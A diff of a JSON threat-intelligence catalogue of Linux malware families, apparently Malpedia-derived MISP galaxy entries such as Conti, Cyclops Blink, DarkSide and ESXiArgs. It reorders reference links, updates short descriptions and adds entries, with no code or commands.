+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
+ "https://damonmccoy.com/papers/Ransomware_eCrime22.pdf",
+ "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html",
+ "https://www.youtube.com/watch?v=cYx7sQRbjGA",
"https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru",
"https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
"https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures",
- "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
- "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html",
"https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
- "https://www.youtube.com/watch?v=cYx7sQRbjGA"
+ "https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
],
"synonyms": [
"Conti Locker"
@@ -3803,25 +4170,25 @@
"value": "CronRAT"
},
{
- "description": "According to CISA, Cyclops Blink appears to be a replacement framework for the VPNFilter malware exposed in 2018, and which exploited network devices, primarily small office/home office (SOHO) routers and network attached storage (NAS) devices. Cyclops Blink has been deployed since at least June 2019, fourteen months after VPNFilter was disrupted. In common with VPNFilter, Cyclops Blink deployment also appears indiscriminate and widespread. The actor has so far primarily deployed Cyclops Blink to WatchGuard devices, but it is likely that Sandworm would be capable of compiling the malware for other architectures and firmware.",
+ "description": "According to CISA, Cyclops Blink appears to be a replacement framework for the VPNFilter malware exposed in 2018, and which exploited network devices, primarily small office/home office (SOHO) routers and network attached storage (NAS) devices. Cyclops Blink has been deployed since at least June 2019, fourteen months after VPNFilter was disrupted. In common with VPNFilter, Cyclops Blink deployment also appears indiscriminate and widespread. The actor has so far primarily deployed Cyclops Blink to WatchGuard and ASUS devices, but it is likely that Sandworm would be capable of compiling the malware for other architectures and firmware.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.cyclops_blink",
- "https://github.com/trendmicro/research/blob/main/cyclops_blink/c2-scripts/check.py",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html",
- "https://www.bleepingcomputer.com/news/security/cisa-warns-orgs-of-watchguard-bug-exploited-by-russian-state-hackers/",
- "https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-054a",
- "https://www.theregister.com/2022/03/18/cyclops_asus_routers/",
- "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyclops-blink-sets-sights-on-asus-routers/Appendix_Cyclops%20Blink%20Sets%20Sights%20on%20ASUS%20Routers.pdf",
- "https://www.justice.gov/opa/press-release/file/1491281/download",
"https://www.justice.gov/opa/video/attorney-general-merrick-b-garland-announces-enforcement-actions-disrupt-and-prosecute",
- "https://attack.mitre.org/groups/G0034",
- "https://www.bleepingcomputer.com/news/security/us-disrupts-russian-cyclops-blink-botnet-before-being-used-in-attacks/",
+ "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation",
+ "https://github.com/trendmicro/research/blob/main/cyclops_blink/c2-scripts/check.py",
"https://www.shadowserver.org/news/shadowserver-special-reports-cyclops-blink/",
- "https://www.bleepingcomputer.com/news/security/asus-warns-of-cyclops-blink-malware-attacks-targeting-routers/"
+ "https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://www.bleepingcomputer.com/news/security/asus-warns-of-cyclops-blink-malware-attacks-targeting-routers/",
+ "https://www.bleepingcomputer.com/news/security/us-disrupts-russian-cyclops-blink-botnet-before-being-used-in-attacks/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyclops-blink-sets-sights-on-asus-routers/Appendix_Cyclops%20Blink%20Sets%20Sights%20on%20ASUS%20Routers.pdf",
+ "https://www.bleepingcomputer.com/news/security/cisa-warns-orgs-of-watchguard-bug-exploited-by-russian-state-hackers/",
+ "https://www.justice.gov/opa/press-release/file/1491281/download",
+ "https://www.theregister.com/2022/03/18/cyclops_asus_routers/",
+ "https://attack.mitre.org/groups/G0034",
+ "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html"
],
"synonyms": [],
"type": []
@@ -3834,15 +4201,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.dacls",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://blog.netlab.360.com/dacls-the-dual-platform-rat/",
+ "https://www.sygnia.co/mata-framework",
+ "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/",
+ "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
"https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
"https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
- "https://blog.netlab.360.com/dacls-the-dual-platform-rat/",
- "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/",
- "https://www.sygnia.co/mata-framework",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought"
+ "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
],
"synonyms": [],
"type": []
@@ -3855,11 +4222,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.dark",
- "https://twitter.com/ESETresearch/status/1440052837820428298?s=20",
- "https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/",
"https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities",
+ "https://twitter.com/ESETresearch/status/1440052837820428298?s=20",
+ "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx",
"https://www.radware.com/getmedia/d312a5fa-2d8d-4c1e-b31e-73046f24bf35/Alert-Dark-OMIGOD.aspx",
- "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx"
+ "https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/"
],
"synonyms": [
"Dark.IoT"
@@ -3888,58 +4255,59 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.darkside",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/",
"https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/",
- "https://blog.group-ib.com/blackmatter#",
- "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636",
- "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/",
- "https://www.nytimes.com/2021/05/29/world/europe/ransomware-russia-darkside.html",
- "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted",
- "https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/",
- "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access",
- "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/",
- "https://abcnews.go.com/Politics/biden-speak-colonial-pipeline-attack-americans-face-gasoline/story?id=77666212",
"https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
- "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
- "https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside",
- "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
- "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.ic3.gov/Media/News/2021/211101.pdf",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
- "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
- "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkside-ransomware-victims-sold-short/",
- "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin",
- "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
- "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
+ "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
"https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime",
- "https://twitter.com/JAMESWT_MHT/status/1388301138437578757",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
- "https://www.youtube.com/watch?v=NIiEcOryLpI",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://twitter.com/GelosSnake/status/1451465959894667275",
- "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/",
- "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/",
+ "https://www.youtube.com/watch?v=qxPXxWMI2i4",
+ "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside",
+ "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/",
+ "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
+ "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.nytimes.com/2021/05/29/world/europe/ransomware-russia-darkside.html",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://abcnews.go.com/Politics/biden-speak-colonial-pipeline-attack-americans-face-gasoline/story?id=77666212",
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
+ "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/",
"https://pylos.co/2021/05/13/mind-the-air-gap/",
"https://otx.alienvault.com/pulse/60d0afbc395c24edefb33bb9",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/",
+ "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted",
+ "https://twitter.com/GelosSnake/status/1451465959894667275",
+ "https://blog.group-ib.com/blackmatter#",
+ "https://www.ic3.gov/Media/News/2021/211101.pdf",
+ "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
+ "https://twitter.com/JAMESWT_MHT/status/1388301138437578757",
+ "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/",
"https://cybersecurity.att.com/blogs/labs-research/darkside-raas-in-linux-version",
- "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/",
- "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
- "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
+ "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
"https://blog.group-ib.com/blackmatter2",
- "https://www.youtube.com/watch?v=qxPXxWMI2i4"
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
+ "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access",
+ "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/",
+ "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims",
+ "https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/",
+ "https://www.youtube.com/watch?v=NIiEcOryLpI",
+ "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
+ "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/",
+ "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group"
],
"synonyms": [],
"type": []
@@ -3966,9 +4334,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddg",
"https://blog.netlab.360.com/ddg-mining-botnet-jin-qi-huo-dong-fen-xi/",
- "https://blog.netlab.360.com/threat-alert-ddg-3013-is-out/",
"https://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/",
"https://blog.netlab.360.com/ddg-botnet-round-x-is-there-an-ending/",
+ "https://blog.netlab.360.com/threat-alert-ddg-3013-is-out/",
"https://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-away/"
],
"synonyms": [],
@@ -3991,14 +4359,14 @@
"value": "ddoor"
},
{
- "description": "DEADBOLT is a linux ransomware written in GO, targeting QNAP NAS devices worldwide. The files are encrypted with AES128 encryption and will have the .deadbolt extension appended to file names.",
+ "description": "DEADBOLT is a linux ransomware written in Go, targeting QNAP NAS devices worldwide. The files are encrypted with AES128 encryption and will have the .deadbolt extension appended to file names.\r\n\r\n",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.deadbolt",
"https://community.riskiq.com/article/1601124b",
+ "https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html",
"https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://www.bleepingcomputer.com/news/security/new-deadbolt-ransomware-targets-qnap-devices-asks-50-btc-for-master-key/",
- "https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html"
+ "https://www.bleepingcomputer.com/news/security/new-deadbolt-ransomware-targets-qnap-devices-asks-50-btc-for-master-key/"
],
"synonyms": [],
"type": []
@@ -4011,8 +4379,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.denonia",
- "https://thehackernews.com/2022/04/first-malware-targeting-aws-lambda.html",
- "https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/"
+ "https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/",
+ "https://thehackernews.com/2022/04/first-malware-targeting-aws-lambda.html"
],
"synonyms": [],
"type": []
@@ -4025,9 +4393,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.derusbi",
- "https://twitter.com/IntezerLabs/status/1407676522534735873?s=20",
+ "https://attack.mitre.org/groups/G0001/",
"https://attack.mitre.org/groups/G0096",
- "https://attack.mitre.org/groups/G0001/"
+ "https://twitter.com/IntezerLabs/status/1407676522534735873?s=20"
],
"synonyms": [],
"type": []
@@ -4041,8 +4409,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.dofloo",
"https://blog.syscall.party/post/aes-ddos-analysis-part-1/",
- "https://www.bleepingcomputer.com/news/security/exposed-docker-apis-abused-by-ddos-cryptojacking-botnet-malware/",
- "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf"
+ "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf",
+ "https://www.bleepingcomputer.com/news/security/exposed-docker-apis-abused-by-ddos-cryptojacking-botnet-malware/"
],
"synonyms": [
"AESDDoS"
@@ -4058,8 +4426,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.doki",
"https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.securecoding.com/blog/all-about-doki-malware/",
- "https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/"
+ "https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/",
+ "https://www.securecoding.com/blog/all-about-doki-malware/"
],
"synonyms": [],
"type": []
@@ -4072,8 +4440,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.doublefantasy",
- "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "https://www.antiy.com/response/FROM_EQUATION_TO_EQUATIONS.pdf"
+ "https://www.antiy.com/response/FROM_EQUATION_TO_EQUATIONS.pdf",
+ "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/"
],
"synonyms": [],
"type": []
@@ -4086,15 +4454,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury",
- "https://www.welivesecurity.com/2014/10/15/operation-windigo-good-job-eset-says-malware-author/",
"https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf",
- "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/",
"https://csirt.gov.it/data/cms/posts/582/attachments/66ca2e9a-68cd-4df5-81a2-674c31a699c2/download",
- "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/",
- "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy",
"https://security.web.cern.ch/security/advisories/windigo/windigo.shtml",
- "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/"
+ "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/",
+ "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/",
+ "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/",
+ "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy",
+ "https://www.welivesecurity.com/2014/10/15/operation-windigo-good-job-eset-says-malware-author/",
+ "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf"
],
"synonyms": [],
"type": []
@@ -4107,9 +4475,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.echobot",
+ "https://www.bleepingcomputer.com/news/security/new-echobot-botnet-variant-uses-over-50-exploits-to-propagate/",
"https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/",
"https://blogs.akamai.com/sitr/2019/06/latest-echobot-26-infection-vectors.html",
- "https://www.bleepingcomputer.com/news/security/new-echobot-botnet-variant-uses-over-50-exploits-to-propagate/",
"https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada"
],
"synonyms": [],
@@ -4119,12 +4487,14 @@
"value": "Echobot"
},
{
- "description": "",
+ "description": "According to the Infosec Institute, EnemyBot is a dangerous IoT botnet that has made headlines in the last few weeks. This threat, which seems to be disseminated by the Keksec group, expanded its features by adding recent vulnerabilities discovered in 2022. It was designed to attack web servers, Android devices and content management systems (CMS) servers.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.enemybot",
- "https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory",
"https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet",
+ "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux",
+ "https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/",
+ "https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory",
"https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers"
],
"synonyms": [],
@@ -4147,14 +4517,30 @@
"uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864",
"value": "Erebus (ELF)"
},
+ {
+ "description": "Ransomware used to target ESXi servers.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.esxi_args",
+ "https://blog.ovhcloud.com/ransomware-targeting-vmware-esxi/",
+ "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/",
+ "https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/",
+ "https://www.youtube.com/watch?v=bBcvqxPdjoI"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7550af7f-91cc-49e7-a4c5-d4e4d993cbef",
+ "value": "ESXiArgs"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.evilgnome",
- "https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/",
+ "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf",
"https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
- "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf"
+ "https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/"
],
"synonyms": [],
"type": []
@@ -4180,14 +4566,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.exaramel",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
- "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm",
"https://www.wired.com/story/sandworm-centreon-russia-hack/",
- "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
- "https://attack.mitre.org/groups/G0034",
+ "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
"https://twitter.com/craiu/status/1361581668092493824",
- "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
+ "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
+ "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
+ "https://attack.mitre.org/groups/G0034"
],
"synonyms": [],
"type": []
@@ -4227,10 +4613,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot",
+ "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html",
"https://blog.netlab.360.com/fbot-is-now-riding-the-traffic-and-transportation-smart-devices-en/",
"https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/",
- "https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html",
- "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html"
+ "https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html"
],
"synonyms": [],
"type": []
@@ -4266,6 +4652,20 @@
"uuid": "ac30f2be-8153-4588-b29c-5e5863792930",
"value": "floodor"
},
+ {
+ "description": "Malware used to run a DDoS botnet.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fodcha",
+ "https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/",
+ "https://www.bleepingcomputer.com/news/security/fodcha-ddos-botnet-reaches-1tbps-in-power-injects-ransoms-in-packets/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4a64a1ca-e5bc-4a27-bff2-1c68cea05ba7",
+ "value": "Fodcha"
+ },
{
"description": "This family utilizes custom modules allowing for remote access, credential harvesting (e.g. by modifying sshd) and proxy usage.\r\n\r\nIt comes with a rootkit as well.",
"meta": {
@@ -4284,11 +4684,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.securityweek.com/sophisticated-fritzfrog-p2p-botnet-returns-after-long-break",
"https://www.akamai.com/blog/security/fritzfrog-p2p",
- "https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/"
+ "https://www.securityweek.com/sophisticated-fritzfrog-p2p-botnet-returns-after-long-break",
+ "https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/",
